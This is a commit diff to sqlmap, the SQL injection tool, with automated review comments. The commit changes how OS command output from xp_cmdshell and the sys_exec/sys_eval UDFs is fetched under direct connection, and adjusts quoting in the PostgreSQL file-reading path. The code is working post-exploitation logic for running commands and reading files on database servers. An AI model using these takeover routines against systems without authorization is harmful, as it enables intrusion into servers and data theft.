

Commit 121148f

committed
There was no point relying on a support table (sqlmapoutput) to get the stdout of executed OS commands when using direct connection (-d) and it saves also number of requests.
Also, BULK INSERT apparently does not work on MSSQL when running as Network Service (at least on Windows XP), which is one more reason to avoid using the support table. Minor fix also to treat MSSQL's EXEC statements as SELECT ones.
1 parent ebd40b3 commit 121148f

4 files changed

Lines changed: 54 additions & 22 deletions


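--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -47,7 +47,7 @@ def direct(query, content=True):
 logger.log(9, query)
 
 start = time.time()
-if not select:
+if not select and "EXEC " not in query:
 _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
 elif conf.hostname in kb.resumedQueries and query in kb.resumedQueries[conf.hostname] and "sqlmapoutput" not in query and "sqlmapfile" not in query:
 try: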
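Review bot: The new `"EXEC " not in query` test on the changed line is a case-sensitive substring match, so a lowercase `exec ...`, an `EXECUTE ...`, or `EXEC(...)` with no trailing space still takes the execute-without-result path, while any SELECT whose text merely contains `EXEC ` (for instance inside a string literal) is routed to the result-fetching branch. A word-boundary, case-insensitive check such as `re.search(r"\bEXEC(UTE)?\b", query, re.I)` would cover the forms MSSQL actually accepts, assuming `re` is available in this module. Whichever form is kept, a one-line comment explaining that EXEC is treated as a row-returning statement here would save the next reader a trip to the commit log. The body of `direct()` continues on both sides of this hunk.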

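--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -76,32 +76,50 @@ def udfCreateSupportTbl(self, dataType):
 
 self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
 
+def udfForgeCmd(self, cmd):
+if not cmd.startswith("'"):
+cmd = "'%s" % cmd
+
+if not cmd.endswith("'"):
+cmd = "%s'" % cmd
+
+return cmd
+
 def udfExecCmd(self, cmd, silent=False, udfName=None):
 if udfName is None:
-cmd = "'%s'" % cmd
 udfName = "sys_exec"
 
-cmd = unescaper.unescape(cmd)
+cmd = unescaper.unescape(self.udfForgeCmd(cmd))
 
-inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
+return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
 
 def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
 if udfName is None:
-cmd = "'%s'" % cmd
 udfName = "sys_eval"
 
-cmd = unescaper.unescape(cmd)
+if conf.direct:
+output = self.udfExecCmd(cmd, udfName=udfName)
+
+if output and isinstance(output, (list, tuple)):
+new_output = ""
+
+for line in output:
+new_output += line.replace("\r", "\n")
 
-inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
-output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
-inject.goStacked("DELETE FROM %s" % self.cmdTblName)
+output = new_output
+else:
+cmd = unescaper.unescape(self.udfForgeCmd(cmd))
 
-if output and isinstance(output, (list, tuple)):
-output = output[0]
+inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
+output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
+inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 
 if output and isinstance(output, (list, tuple)):
 output = output[0]
 
+if output and isinstance(output, (list, tuple)):
+output = output[0]
+
 return output
 
 def udfCheckNeeded(self):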
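Review bot: The new `conf.direct` branch of `udfEvalCmd` never applies the `first`/`last` parameters, whereas the support-table branch forwards them to `inject.getValue` as `firstChar`/`lastChar`, so a caller asking for a slice of the output gets the whole result in direct mode; either slice `new_output` with the same convention `getValue` uses or state in a docstring that the range is ignored when `-d` is in effect. The loop `new_output += line.replace("\r", "\n")` also assumes every element returned by `inject.goStacked` is a `str`; if the connector yields `None` for NULL cells or row tuples instead, this raises `AttributeError`, and the sibling `xpCmdshellEvalCmd` at least special-cases NULL rows, so a guard such as `if line is None: continue` (or the same `"NULL"` handling) would keep the two paths consistent. The repeated `if output and isinstance(output, (list, tuple)): output = output[0]` at the end is a no-op for the direct branch and reads like a merge leftover; if two levels of unwrapping are intentional for nested sequences, a one-line comment saying so would help.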

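--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -107,29 +107,43 @@ def xpCmdshellForgeCmd(self, cmd):
 
 def xpCmdshellExecCmd(self, cmd, silent=False):
 cmd = self.xpCmdshellForgeCmd(cmd)
-inject.goStacked(cmd, silent)
+return inject.goStacked(cmd, silent)
 
 def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
 self.getRemoteTempPath()
 
-tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-cmd = "%s > \"%s\"" % (cmd, tmpFile)
+if conf.direct:
+output = self.xpCmdshellExecCmd(cmd)
 
-self.xpCmdshellExecCmd(cmd)
+if output and isinstance(output, (list, tuple)):
+new_output = ""
+
+for line in output:
+if line == "NULL":
+new_output += "\n"
+else:
+new_output += "%s\n" % line.strip("\r")
 
-inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
+output = new_output
+else:
+tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+cmd = "%s > \"%s\"" % (cmd, tmpFile)
+
+self.xpCmdshellExecCmd(cmd)
 
-self.delRemoteFile(tmpFile)
+inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
 
-output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, unique=False, firstChar=first, lastChar=last, safeCharEncode=False)
-inject.goStacked("DELETE FROM %s" % self.cmdTblName)
+self.delRemoteFile(tmpFile)
 
-if output and isinstance(output, (list, tuple)):
-output = output[0]
+output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, unique=False, firstChar=first, lastChar=last, safeCharEncode=False)
+inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 
 if output and isinstance(output, (list, tuple)):
 output = output[0]
 
+if output and isinstance(output, (list, tuple)):
+output = output[0]
+
 return output
 
 def xpCmdshellInit(self):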
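Review bot: The direct-mode loop in `xpCmdshellEvalCmd` compares `line == "NULL"` and otherwise calls `line.strip("\r")`, so if `conf.dbmsConnector` hands back Python `None` for NULL rows (the usual DB-API behaviour) rather than the literal string `"NULL"`, the `else` branch raises `AttributeError`; a guard such as `if line is None or line == "NULL":` covers both representations and costs nothing. As in `udfEvalCmd`, `first`/`last` are silently ignored on this path while the BULK INSERT path still forwards them to `inject.getValue`, which should at least be documented in the method's docstring. `self.getRemoteTempPath()` at the top of the method still runs unconditionally although the direct branch never reads `conf.tmpPath`; if that helper issues its own query this is one wasted round-trip per command under `-d`, so moving the call into the `else` branch would match the commit's stated goal of saving requests. `xpCmdshellForgeCmd` starts before this hunk and `xpCmdshellInit` continues after it.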

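--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -34,7 +34,7 @@ def stackedReadFile(self, rFile):
 
 self.initEnv()
 
-return self.udfEvalCmd(cmd="'%s'" % rFile, udfName="sys_fileread")
+return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread")
 
 def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
 errMsg = "PostgreSQL does not support file upload with UNION "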
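Review bot: `rFile` is now handed to `udfEvalCmd` bare and relies on `udfForgeCmd`, which only adds a leading or trailing `'` when one is missing and does no escaping, so a path containing a single quote is spliced into `sys_fileread('...')` verbatim and will break or alter the statement, and a path that happens to start and end with `'` is passed through without any wrapping at all. This is not a regression — the removed line had the same gap — but since the quoting responsibility has moved, a comment at the call site such as `# rFile must not contain a single quote; udfForgeCmd only wraps, it does not escape` (or escaping with `rFile.replace("'", "''")` before the call, unless `unescaper.unescape` is known to re-encode the literal) would make the contract explicit. `stackedReadFile` begins before this hunk.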
